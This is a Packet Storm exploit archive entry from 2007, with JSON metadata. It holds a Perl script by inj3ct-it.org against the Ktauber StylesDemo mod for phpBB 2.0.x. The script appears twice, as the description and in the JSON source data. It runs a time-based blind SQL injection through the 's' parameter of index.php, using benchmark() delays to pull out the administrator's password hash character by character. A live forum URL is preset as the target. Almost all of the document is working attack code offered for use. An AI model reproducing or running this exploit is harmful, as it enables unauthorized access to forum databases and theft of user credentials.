Search...

phpbbstyles-sql.txt

2007-09-19T00:00:00

ID PACKETSTORM:59406
Type packetstorm
Reporter inj3ct-it.org
Modified 2007-09-19T00:00:00

Description

                                        
                                            `#---------------------------------------------------------------  
# ____ __________ __ ____ __   
#/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_   
# | |/ \ | | _(__ &lt;_/ ___\ __\ ______ | \ __\  
# | | | \ | |/ \ \___| | /_____/ | || |   
# |___|___| /\__| /______ /\___ &gt;__| |___||__|   
# \/\______| \/ \/   
#---------------------------------------------------------------  
#  
#Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
#  
#--------------------------------------------------------------  
#  
#Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites  
#  
#---------------------------------------------------------------  
#  
# Coded by nexen  
#  
# GreetZ: Rossi46go for code   
#  
# Description:  
#  
#XSS and SQL Injection  
#  
#---------------------------------------------------------------  
#  
#  
#  
#  
#---------------------------------------------------------------  
#exploit.pl  
#---------------------------------------------------------------  
#  
#  
#  
use LWP::UserAgent;  
use HTTP::Request::Common;  
use Time::HiRes;  
######################################## CONFIGURAZIONE EXPLOIT ##########################################################################  
$sito = "http://www.forumup.com/stylesdemo/"; # insert vulnerable site as http://[site]/[path]/  
##########################################################################################################################################  
$var = "1";  
my $hash;  
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);  
  
sub richiesta {  
$var = $_[0];  
$ua = LWP::UserAgent-&gt;new;  
$inizio=Time::HiRes::time();  
$response = $ua-&gt;request(GET $var,  
s =&gt; $var);  
$response-&gt;is_success() || print("$!\n");  
$fine=Time::HiRes::time();  
$tempo=$fine-$inizio;  
return $tempo  
}  
  
sub aggiorna{  
system("cls");  
print "Tempo sql : " . $_[4] . " secondi\n";  
print "Hash : " . $_[3] . "\n";  
}  
  
#print richiesta;  
  
for ($i=1;$i&lt;33;$i++)  
{  
for ($j=0;$j&lt;16;$j++)  
{  
  
$var=$sito."index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*";  
$tempo=richiesta($var);  
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);  
if($tempo&gt;9)  
{  
$tempo=richiesta($var);  
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);  
if($tempo&gt;9)  
{  
$hash .=chr($array[$j]);  
aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);  
$j=200;  
}  
}  
  
}  
if($i==1)  
{  
if($hash eq "")  
{  
$i=200;  
print "Attacco Fallito Sito Fixato\n";  
}  
}  
}  
  
  
print "Attacco Terminato\n\n";  
  
system("pause");  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/59406/phpbbstyles-sql.txt", "sourceData": "`#--------------------------------------------------------------- \n# ____ __________ __ ____ __ \n#/_ | ____ |__\\_____ \\ _____/ |_ /_ |/ |_ \n# | |/ \\ | | _(__ <_/ ___\\ __\\ ______ | \\ __\\ \n# | | | \\ | |/ \\ \\___| | /_____/ | || | \n# |___|___| /\\__| /______ /\\___ >__| |___||__| \n# \\/\\______| \\/ \\/ \n#--------------------------------------------------------------- \n# \n#Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org \n# \n#-------------------------------------------------------------- \n# \n#Ktauber.com StylesDemo Mod for phpbb 2.0.xx Multiple Vulnerabilites \n# \n#--------------------------------------------------------------- \n# \n# Coded by nexen \n# \n# GreetZ: Rossi46go for code \n# \n# Description: \n# \n#XSS and SQL Injection \n# \n#--------------------------------------------------------------- \n# \n# \n# \n# \n#--------------------------------------------------------------- \n#exploit.pl \n#--------------------------------------------------------------- \n# \n# \n# \nuse LWP::UserAgent; \nuse HTTP::Request::Common; \nuse Time::HiRes; \n######################################## CONFIGURAZIONE EXPLOIT ########################################################################## \n$sito = \"http://www.forumup.com/stylesdemo/\"; # insert vulnerable site as http://[site]/[path]/ \n########################################################################################################################################## \n$var = \"1\"; \nmy $hash; \n@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); \n \nsub richiesta { \n$var = $_[0]; \n$ua = LWP::UserAgent->new; \n$inizio=Time::HiRes::time(); \n$response = $ua->request(GET $var, \ns => $var); \n$response->is_success() || print(\"$!\\n\"); \n$fine=Time::HiRes::time(); \n$tempo=$fine-$inizio; \nreturn $tempo \n} \n \nsub aggiorna{ \nsystem(\"cls\"); \nprint \"Tempo sql : \" . $_[4] . \" secondi\\n\"; \nprint \"Hash : \" . $_[3] . \"\\n\"; \n} \n \n#print richiesta; \n \nfor ($i=1;$i<33;$i++) \n{ \nfor ($j=0;$j<16;$j++) \n{ \n \n$var=$sito.\"index.php?s=(SELECT IF((ASCII(SUBSTRING(`user_password`,\".$i.\",1))=\".$array[$j].\"),benchmark(200000000,CHAR(0)),0) FROM phpbb_users WHERE `user_id`=2)/*\"; \n$tempo=richiesta($var); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \nif($tempo>9) \n{ \n$tempo=richiesta($var); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \nif($tempo>9) \n{ \n$hash .=chr($array[$j]); \naggiorna($host,$tempodefault,$j,$hash,$tempo,$i); \n$j=200; \n} \n} \n \n} \nif($i==1) \n{ \nif($hash eq \"\") \n{ \n$i=200; \nprint \"Attacco Fallito Sito Fixato\\n\"; \n} \n} \n} \n \n \nprint \"Attacco Terminato\\n\\n\"; \n \nsystem(\"pause\"); \n`\n", "edition": 1, "references": [], "modified": "2007-09-19T00:00:00", "hash": "1b591d594b8074d8a5efe6366531b6e6305cb250af131ec92572a0cb7ef603f1", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/59406/phpbbstyles-sql.txt.html", "description": "", "id": "PACKETSTORM:59406", "reporter": "inj3ct-it.org", "lastseen": "2016-11-03T10:20:08", "published": "2007-09-19T00:00:00", "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "phpbbstyles-sql.txt", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "807bdc72da041f9165520549ade9c6e3", "key": "href"}, {"hash": "096eca1b883bf3994e28586a2c5baae6", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "096eca1b883bf3994e28586a2c5baae6", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9adffcb2db33d1b05cb8f74979bff89d", "key": "reporter"}, {"hash": "a425a75a3b81ea672bb3d98175a510f2", "key": "sourceData"}, {"hash": "fce9e7dbedb640b24170dec473aa5e2b", "key": "sourceHref"}, {"hash": "02462ec9aa588256c3b2fcfabde777ff", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}